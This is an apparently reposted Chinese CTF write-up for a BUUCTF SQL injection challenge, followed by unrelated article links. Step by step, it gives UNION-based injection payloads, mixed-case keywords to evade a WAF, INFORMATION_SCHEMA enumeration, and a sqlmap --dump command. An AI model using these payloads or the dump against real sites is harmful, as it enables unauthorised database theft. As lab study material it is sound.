当前位置: 首页 > news >正文

buuctf week2-web-ez_sql

news 2025/7/13 4:51:35

闭合之后尝试判断字段数,存在WAF,使用大小写绕过(后面的sql语句也需要进行大小写绕过)

?id=1' Order by 5--+

测出有5列

?id=1' Order by 6--+

查一下数据库名、版本、用户等信息

?id=1'Union Select database(),version(),user(),4,5 --+

 查出数据库ctf下的表 

?id=0' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+

尝试在表here_is_flag下查找flag

?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+

 flag{e66fd4f6-00ac-4a66-b47e-1af1355d5630}

或者使用sqlmap直接跑出所有库和表内容

sqlmap -u "http://3d75c5bf-0a9e-41fc-bb45-e6877f646556.node4.buuoj.cn:81/?id=1"  --columns --dump

http://www.lryc.cn/news/191684.html

相关文章:

  • 实验2.1.2 交换机的常用配置
  • 功率放大器应用场景分析报告
  • 解决 Centos 安装 Python 3.10 的报错: Could not import runpy module
  • HTML5简介-HTML5 新增语义化标签-HTML5 新增多媒体标签
  • pyqt---子线程进行gui操作导致界面崩溃
  • vue-cli 输出的模板 html 文件使用条件语句
  • Spring Boot集成kafka的相关配置
  • Git(11)——Git相关问题解答以及常用命令总结
  • 【LeetCode高频SQL50题-基础版】打卡第7天:第36~40题
  • C++入门1
  • Matlab论文插图绘制模板第118期—进阶气泡图
  • grafana接入OpenTSDB设置大盘语法
  • HarmonyOS 远端状态订阅开发实例
  • 实战一:Http轮询弹幕拦截
  • 虚拟机独立 IP 配置
  • 升级教育技术软件的多合一解决方案
  • c++视觉检测-----角点检测
  • 虚拟机安装Docker
  • 虚幻引擎5:增强输入的使用方法
  • buffer overflow detected
  • 【c++源码】老飞飞源码完整v15源码(包含数据库前端后端源文件)
  • MySQL创建数据库、创建表操作和用户权限
  • 时间序列分析基础篇
  • Idea JavaWeb项目,继承自HttpFilter的过滤器,启动Tomcat时部署工件出错
  • 02Maven核心程序的下载与settings.xml文件的配置,环境变量的配置
  • 栈实现深度优先搜索
  • Java 基于SpringBoot的某家乡美食系统
  • splice 和 slice 会改变原数组吗? 怎么删除数组最后一个元素?
  • 解锁互联网安全的新钥匙:JWT(JSON Web Token)
  • alsa音频pcm设备之i2c调试